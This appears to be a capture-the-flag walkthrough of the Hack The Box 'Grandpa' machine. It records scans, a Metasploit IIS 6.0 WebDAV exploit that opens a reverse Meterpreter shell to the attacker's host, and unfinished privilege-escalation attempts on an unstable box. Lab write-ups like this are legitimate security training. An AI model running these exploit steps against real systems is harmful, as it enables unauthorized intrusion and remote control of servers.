Grandpa
Starting with a port scan.
root@n0w4n:~/opt/htb/grandpa# nmap -T4 -n -sS -sV -sC -p- 10.10.10.14 Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 14:09 CEST Nmap scan report for 10.10.10.14 Host is up (0.027s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Server Type: Microsoft-IIS/6.0 | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | WebDAV type: Unkown | Server Date: Wed, 27 Jun 2018 12:11:04 GMT |_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 115.49 seconds
root@n0w4n:~/opt/tools/dirsearch# python3 dirsearch.py -u http://10.10.10.14/ -e php,txt -x 403,404 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: php, txt | Threads: 10 | Wordlist size: 6344 Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-27_14-12-39.log Target: http://10.10.10.14/ [14:12:39] Starting: [14:12:49] 301 - 155B - /_vti_bin -> http://10.10.10.14/%5Fvti%5Fbin/ [14:12:49] 200 - 2KB - /_vti_inf.html [14:12:49] 200 - 195B - /_vti_bin/_vti_aut/author.dll [14:12:49] 200 - 195B - /_vti_bin/_vti_adm/admin.dll [14:12:49] 200 - 106B - /_vti_bin/shtml.exe/qwertyuiop [14:12:49] 200 - 105B - /_vti_bin/shtml.dll/asdfghjkl [14:12:49] 200 - 96B - /_vti_bin/shtml.exe?_vti_rpc [14:12:49] 200 - 96B - /_vti_bin/shtml.dll [14:12:49] 500 - 112B - /_vti_pvt/ [14:12:49] 500 - 112B - /_vti_pvt/administrator.pwd [14:12:49] 500 - 112B - /_vti_pvt/authors.pwd [14:12:49] 500 - 112B - /_vti_pvt/administrators.pwd [14:12:49] 500 - 112B - /_vti_pvt/shtml.exe [14:12:49] 500 - 112B - /_vti_pvt/service.pwd [14:12:49] 500 - 112B - /_vti_pvt/users.pwd [14:13:07] 301 - 149B - /Images -> http://10.10.10.14/Images/ [14:13:07] 301 - 149B - /images -> http://10.10.10.14/images/ [14:13:13] 200 - 2KB - /postinfo.html Task Completed
root@n0w4n:~/opt/htb/grandpa# nikto -h http://10.10.10.14
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.14
+ Target Hostname: 10.10.10.14
+ Target Port: 80
+ Start Time: 2018-06-27 14:16:36 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (SEARCH PROPFIND LOCK UNLOCK COPY PROPPATCH MKCOL listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ 7499 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time: 2018-06-27 14:20:53 (GMT2) (257 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@n0w4n:~/opt/tools/dirsearch# searchsploit webdav
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache 1.3.12 - WebDAV Directory Listings | exploits/linux/remote/20210.txt
Apache JackRabbit - WebDAV XML External Entity | exploits/java/webapps/37110.py
Apache Tomcat - 'WebDAV' Remote File Disclosure | exploits/multiple/remote/4530.pl
Apache Tomcat - WebDAV SSL Remote File Disclosure | exploits/linux/remote/4552.pl
Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities | exploits/ios/webapps/27655.txt
Liferay 6.0.x - WebDAV File Reading | exploits/multiple/remote/18763.txt
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow | exploits/windows/remote/1.c
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit) | exploits/windows/remote/16471.rb
Microsoft IIS - WebDAV XML Denial of Service (MS04-030) | exploits/windows/dos/585.pl
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit) | exploits/windows/remote/41992.rb
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1) | exploits/windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2) | exploits/windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3) | exploits/windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4) | exploits/windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit) | exploits/windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service | exploits/windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service | exploits/windows/dos/20854.txt
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service | exploits/windows/dos/22670.c
Microsoft IIS 5.0 - WebDAV Remote | exploits/windows/remote/2.c
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav) | exploits/windows/remote/51.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure | exploits/windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | exploits/windows/remote/8754.patch
Microsoft Windows - WebDAV Remote Code Execution (2) | exploits/windows/remote/36.c
Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2) | exploits/windows/local/39788.txt
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1) | exploits/windows_x86/local/39432.c
Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit) | exploits/windows/local/40085.rb
Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Privilege Escalation | exploits/windows/local/36424.txt
Neon WebDAV Client Library 0.2x - Format String | exploits/linux/dos/23999.txt
Nginx 0.7.61 - WebDAV Directory Traversal | exploits/multiple/remote/9829.txt
Sun Java System Web Server 6.1/7.0 - WebDAV Format String | exploits/multiple/dos/33560.txt
Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit) | exploits/multiple/remote/16314.rb
WebDAV - Application DLL Hijacker (Metasploit) | exploits/windows/remote/16550.rb
XAMPP - WebDAV PHP Upload (Metasploit) | exploits/windows/remote/18367.rb
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcode Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) | shellcodes/windows_x86/39519.c
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Ok…..did some enumeration and it looks like there is a vulnerability in webDAV which can be exploited through metasploit.
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl): Name Current Setting Required Description ---- --------------- -------- ----------- MAXPATHLENGTH 60 yes End of physical path brute force MINPATHLENGTH 3 yes Start of physical path brute force Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path of IIS 6 web application VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Microsoft Windows Server 2003 R2 SP2 x86 msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.14 rhost => 10.10.10.14 msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit -j [*] Exploit running as background job 0. [*] Started reverse TCP handler on 10.10.14.2:4444 msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > [*] Sending stage (179779 bytes) to 10.10.10.14 [*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.14:1142) at 2018-06-27 14:31:41 +0200
meterpreter > sysinfo Computer : GRANPA OS : Windows .NET Server (Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Domain : HTB Logged On Users : 3 Meterpreter : x86/windows
meterpreter > shell [-] Failed to spawn shell with thread impersonation. Retrying without it. Process 2212 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>whoami whoami nt authority\network service
meterpreter > dir Listing: c:\Documents and Settings ================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2017-04-12 16:12:15 +0200 Administrator 40777/rwxrwxrwx 0 dir 2017-04-12 16:03:34 +0200 All Users 40777/rwxrwxrwx 0 dir 2017-04-12 16:04:48 +0200 Default User 40777/rwxrwxrwx 0 dir 2017-04-12 16:32:01 +0200 Harry 40777/rwxrwxrwx 0 dir 2017-04-12 16:08:32 +0200 LocalService 40777/rwxrwxrwx 0 dir 2017-04-12 16:08:31 +0200 NetworkService
meterpreter > background [*] Backgrounding session 1... msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester msf post(multi/recon/local_exploit_suggester) > options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.14 - Collecting local exploits for x86/windows... [*] 10.10.10.14 - 39 exploit checks are being tried... [+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed
There are a few suggested possibilities. The box acts a bit unstable and with getting the previous session it took some tries. Eventually I got a meterpreter session.
msf exploit(windows/local/ms14_070_tcpip_ioctl) > [*] Storing the shellcode in memory... [*] Triggering the vulnerability... [*] Checking privileges after exploitation... [+] Exploitation successful! [*] 10.10.10.14 - Meterpreter session 1 closed. Reason: Died
And for the 6th time in a row the process hangs.What is wrong with this machine?
root@n0w4n:~/opt/htb/grandpa# nmap -n -T4 -sS 10.10.10.14 Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 21:22 CEST Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 2.14 seconds
Looks like the machine is down. Because I already did reset this machines twice I think that this machine is a bit off. Maybe I will look at it some other time, but for now I give it a rest and start a new machine.